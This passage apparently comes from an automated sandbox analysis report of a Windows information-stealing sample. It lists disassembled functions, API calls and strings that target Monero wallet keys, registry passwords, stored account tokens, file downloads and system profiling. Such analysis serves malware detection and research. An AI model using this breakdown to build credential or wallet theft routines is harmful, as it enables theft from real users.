                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 3513eab9574f870ac3008d1e90211fe956cbb6912b7b78d6692f58a620c644ec
                      • Instruction ID: 8bd5bca6df3892e5a226774a2ee33e6d60d2f5b283a2db29aa0b74d1655ca757
                      • Opcode Fuzzy Hash: 3513eab9574f870ac3008d1e90211fe956cbb6912b7b78d6692f58a620c644ec
                      • Instruction Fuzzy Hash: 595145B1D5011A57CB15FB60DDA6FED773CBF94301F404299B60A62081EE346B89CFA6
                      Function 005475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 005472D0: memset.MSVCRT ref: 00547314
                        • Part of subcall function 005472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                        • Part of subcall function 005472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                        • Part of subcall function 005472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                        • Part of subcall function 005472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                        • Part of subcall function 005472D0: HeapFree.KERNEL32(00000000), ref: 00547459
                      • lstrcat.KERNEL32(00000000,005617FC), ref: 00547606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00547648
                      • lstrcat.KERNEL32(00000000, : ), ref: 0054765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 0054768F
                      • lstrcat.KERNEL32(00000000,00561804), ref: 005476A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 005476D3
                      • lstrcat.KERNEL32(00000000,00561808), ref: 005476ED
                      • task.LIBCPMTD ref: 005476FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: :
                      • API String ID: 3191641157-3653984579
                      • Opcode ID: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                      • Instruction ID: 044deabaefb69752478f4a9cd8b8b0ef747b106a024b79909f6d9db1906845c1
                      • Opcode Fuzzy Hash: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                      • Instruction Fuzzy Hash: 12318371A4010AEFDB04EBB4DC59DFF7B75FB88305B24810AF102A7251EB38A946CB65
                      Function 005472D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00547314
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                      • HeapFree.KERNEL32(00000000), ref: 00547459
                      • task.LIBCPMTD ref: 00547555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: Password
                      • API String ID: 2808661185-3434357891
                      • Opcode ID: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
                      • Instruction ID: dfd562b83884cecb16fbd4e1631704645cd817438414521d642774f6791628f7
                      • Opcode Fuzzy Hash: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
                      • Instruction Fuzzy Hash: 9E613CB590426D9BDB24DB50CC45FEABBB8BF48304F0085E9E649A6141DBB05FC9CFA1
                      Function 005460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                        • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                      • InternetOpenA.WININET(00560DF7,00000001,00000000,00000000,00000000), ref: 0054610F
                      • StrCmpCA.SHLWAPI(?,0102FC80), ref: 00546147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0054618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005461B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 005461DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0054620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00546249
                      • InternetCloseHandle.WININET(?), ref: 00546253
                      • InternetCloseHandle.WININET(00000000), ref: 00546260
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: 59507e7f1c8fac8384882174f9546b8e9fb74a86fdcf1cc9a9fdece59affcd34
                      • Instruction ID: af584ca26c0e9cd2120ff875c94e8d6bb48393cec1f3a023caf0e4bef631a4e1
                      • Opcode Fuzzy Hash: 59507e7f1c8fac8384882174f9546b8e9fb74a86fdcf1cc9a9fdece59affcd34
                      • Instruction Fuzzy Hash: 035194B1940208BBEF20DF60DC49BEE7B78FB44705F108599B605A71C1DBB46A89CF96
                      Function 0054BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                      • lstrlen.KERNEL32(00000000), ref: 0054BC9F
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0054BCCD
                      • lstrlen.KERNEL32(00000000), ref: 0054BDA5
                      • lstrlen.KERNEL32(00000000), ref: 0054BDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: df0d901d2b0f563244a4750cab4bff0610a1159770ab6b07634c4d911ee0aced
                      • Instruction ID: f3ebce9368cd3ddcef560f9fb02de06f0e249f32f023b29952cbf51ef4b0d7cd
                      • Opcode Fuzzy Hash: df0d901d2b0f563244a4750cab4bff0610a1159770ab6b07634c4d911ee0aced
                      • Instruction Fuzzy Hash: 9CB156719101099BDB04FBA0CC6ADEE7B38BF94301F50465AF907A7191EF346A4DCB66
                      Function 00556770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: 6af148906b4036e8cd00bb592a2c7fa66c4ca73109be37656a3724e3e8ccdfee
                      • Instruction ID: 1168a108d440578a3b88352e1a1992de71763d29cb89d12ad09c8206e86b6754
                      • Opcode Fuzzy Hash: 6af148906b4036e8cd00bb592a2c7fa66c4ca73109be37656a3724e3e8ccdfee
                      • Instruction Fuzzy Hash: 71F0893098424AFFE3449FE0E91972C7B70FB08703F24419AF60587290D67C4B41EB9A
                      Function 00544FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00544FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00544FD1
                      • InternetOpenA.WININET(00560DDF,00000000,00000000,00000000,00000000), ref: 00544FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00545011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00545041
                      • InternetCloseHandle.WININET(?), ref: 005450B9
                      • InternetCloseHandle.WININET(?), ref: 005450C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: a4f9a4164eda008e3c66823cec553df27d72fbb89fb14a765afa5fc77220a7fa
                      • Instruction ID: 982d4b4f9ccea9d7c363bfcab8c934c0b217a0aaa90232d2542d3496d4a9ef8e
                      • Opcode Fuzzy Hash: a4f9a4164eda008e3c66823cec553df27d72fbb89fb14a765afa5fc77220a7fa
                      • Instruction Fuzzy Hash: AC3107B4A40218ABDB20CF54DC89BDDBBB4FB48704F5081D9EA09A7281D7746E858F99
                      Function 00558100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0102F260,00000000,?,00560E2C,00000000,?,00000000), ref: 00558130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00558137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00558158
                      • wsprintfA.USER32 ref: 005581AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2922868504-3474575989
                      • Opcode ID: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
                      • Instruction ID: 3baf981012064c3505892516461b4277773cbd6ad6e3eb0abb3d9f34f52027b9
                      • Opcode Fuzzy Hash: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
                      • Instruction Fuzzy Hash: DC214FB1E44209ABEB10DFD4CC49FAFBB78FB44711F20450AF605BB280D77869058BA5
                      Function 005583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                      • wsprintfA.USER32 ref: 00558459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                      • RegQueryValueExA.ADVAPI32(00000000,0102F080,00000000,000F003F,?,00000400), ref: 005584EC
                      • lstrlen.KERNEL32(?), ref: 00558501
                      • RegQueryValueExA.ADVAPI32(00000000,0102F218,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00560B34), ref: 00558599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00558608
                      • RegCloseKey.ADVAPI32(00000000), ref: 0055861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
                      • Instruction ID: 771b677b6ea2fe72d8ad1349b6ce3bf187fe8077ce4a3b2c10e13faffa7866a9
                      • Opcode Fuzzy Hash: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
                      • Instruction Fuzzy Hash: 14217C7194021CABEB24DB54CC84FE9B7B8FB48700F10C1D9E609A6140DF74AA85CFE4
                      Function 00557690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005576A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 005576AB
                      • RegOpenKeyExA.ADVAPI32(80000002,0101BD48,00000000,00020119,00000000), ref: 005576DD
                      • RegQueryValueExA.ADVAPI32(00000000,0102F230,00000000,00000000,?,000000FF), ref: 005576FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00557708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
                      • Instruction ID: 608aabfbea9ddaaab5bbc92660ad53ed3c26a568b9e027c14e1f19f51b2f1a3f
                      • Opcode Fuzzy Hash: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
                      • Instruction Fuzzy Hash: 150144B5A44308BBEB00DBE4EC59F6D7BB8EB48701F208456FE05D7190D67899048B55
                      Function 00557720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0055773B
                      • RegOpenKeyExA.ADVAPI32(80000002,0101BD48,00000000,00020119,005576B9), ref: 0055775B
                      • RegQueryValueExA.ADVAPI32(005576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0055777A
